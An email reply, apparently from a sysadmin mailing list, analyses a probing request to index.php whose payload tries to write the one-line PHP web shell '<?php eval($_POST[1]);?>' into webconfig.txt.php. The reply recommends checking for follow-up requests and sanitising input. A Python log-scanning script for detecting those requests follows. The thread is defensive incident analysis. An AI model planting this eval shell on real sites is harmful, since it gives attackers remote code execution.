On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:
<?php eval($_POST[1]);?>
I didn't decode the remaining lines. I think they're just trying to do the same
thing.
Fortunately there is no webconfig.txt.php. And all folders in /srv/www belong to root and user wwwrun
is not allowed to write there.
What seems to be happening here is that your system is being probed for vulnerabilities.
The attacker is sending a payload string to your index.php file in hopes that it will not complain and write the string to the file webconfig.txt.php, which the attacker would then attempt to get to with the real hack in the POSTed contents. Are there any requests to get to that file?
You should make sure you sanitize any input to your index.php and reject anything that's not expected.
Ken
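
One way to check for the follow-up requests asked about above, as an added example that is not part of the original message: a Python scan of Apache access-log lines for requests to webconfig.txt.php. The log lines are constructed samples in common log format, and the function and variable names are hypothetical.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: host ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
DROPPED_FILE = "webconfig.txt.php"  # file name from the decoded payload in this thread

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Feb/2017:10:01:02 +0100] "POST /index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [06/Feb/2017:10:01:05 +0100] "GET /webconfig.txt.php HTTP/1.1" 404 210',
    '198.51.100.7 - - [06/Feb/2017:10:03:40 +0100] "GET /index.php?f=webconfig.txt.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [06/Feb/2017:10:04:11 +0100] "POST /webconfig.txt%2Ephp HTTP/1.1" 404 210',
]


def find_followups(lines, name=DROPPED_FILE):
    """Return requests whose URL path contains the dropped file as a path segment."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a common/combined format line
        # Look at the path only: drop the query string, undo percent-encoding,
        # and compare case-insensitively so encoded variants are not missed.
        path = unquote(m["path"].split("?", 1)[0]).lower()
        if name not in path.split("/"):
            continue
        status = int(m["status"])
        hits.append({
            "host": m["host"], "time": m["time"], "method": m["method"],
            "path": m["path"], "status": status,
            # A 2xx status means the file exists and was served: treat as a compromise.
            "served": 200 <= status < 300,
        })
    return hits


if __name__ == "__main__":
    for hit in find_followups(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["method"], hit["path"], hit["status"],
              "SERVED" if hit["served"] else "not served")
```

A 404 on every hit matches the situation described in the thread (the file was never written); any 2xx hit means the upload succeeded and the host needs incident handling.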